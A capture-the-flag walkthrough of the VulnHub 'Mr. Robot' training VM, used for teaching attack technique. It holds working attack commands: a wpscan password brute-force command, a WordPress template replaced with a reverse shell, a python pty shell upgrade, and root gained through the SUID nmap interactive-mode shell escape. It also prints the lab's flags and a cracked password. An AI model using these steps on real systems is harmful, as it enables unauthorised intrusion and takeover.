Mr. Robot

Location

https://www.vulnhub.com

Description

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Enumeration

Mr. Robot is one of the few Hollywood productions that captured the spirit of the black hat hacker right. I wonder if this challenge can maintain that reputation. Let’s find out and let’s start with gathering some information about the target.

nmap -A -T4 -sV -p- 192.168.110.3

[screenshot: nmap.JPG]

Looks like port 80 and 443 are open.

[screenshot: screen1.JPG]

When I try the commands I feel a little like Neo having to choose between the red pill and the blue pill. But then I want to peel back the layers and look inside the source code. Let’s start with the basics. Robots.txt gives me the first flag and an fsociety wordlist.

073403c8a58a1f80d943455fb30724b9

Looks like an md5 hash to me. Hash-identifier confirms it. But unfortunately it’s not a known hash.

WordPress

When running Dirb, I get a long list with directories. One of them is the WordPress login page.

[screenshot: wp.JPG]

I tried wpscan, but it couldn’t enumerate usernames. Also there weren’t a lot of useful vulnerabilities to exploit. Time for some thinking and manual labor.

[screenshot: wp2]

Looks like I have found a username. Let’s see if we can brute force the password of this account with the wordlist I found. The wordlist contains 858160 words. That’s gonna take some time with brute force. Maybe I can trim it down a bit.

sort 'fsocity.dic' | uniq > fsociety.dic
wc fsociety.dic
11451 11451 96747 fsociety.dic

Much better. Now for wpscan again.

wpscan --url http://192.168.110.3 --wp-content-dir '/wp-login.php' --wordlist /root/Documents/CTF/mrRobot/fsociety.dic --threads 50 --username elliot

[screenshot: wp3]

With the username:password I log in to the WordPress account.

Getting a shell

[screenshot: wp-login]

Let’s try and upload a dirty php.

[screenshot: forbidden.JPG]

That’s not gonna work. Because there is no way for me to change the file-format restriction on uploads, I choose another path. I’m gonna adjust a page.

[screenshot: template]

Let’s take the top one and replace the code with a reverse shell from pentestmonkey.

[screenshot: shell.JPG]

I’m in. Let’s grab a proper shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Inside the home directory there is a directory named robot which contains 2 files. One is the second flag and the other contains the username ‘robot’ plus a hash. Looks like I need to crack this hash. Before using a time-consuming tool, I check the hash with CrackStation and it appears to be a known hash.

[screenshot: crack.JPG]

Time to bump up my privileges.

daemon@linux:/home/robot$ su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Let’s get flag number 2.

robot@linux:~$ cd /home/robot/
robot@linux:~$ ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

After I looked around some more in the system, I checked the installed applications to see what’s on this machine.

compgen -c | sort

[screenshot: compgen.JPG]

It has an old version of nmap installed. I will use the --interactive option to run a shell through the SUID-root binary.

robot@linux:/$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

Flag number 3

Time to get the third and final flag.

# cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

The End!

I must say it was a fun challenge, but I really missed the continuation of the Mr. Robot theme inside the box. No themed clues or witty comments. Just obtaining root and collecting the 3 flags.
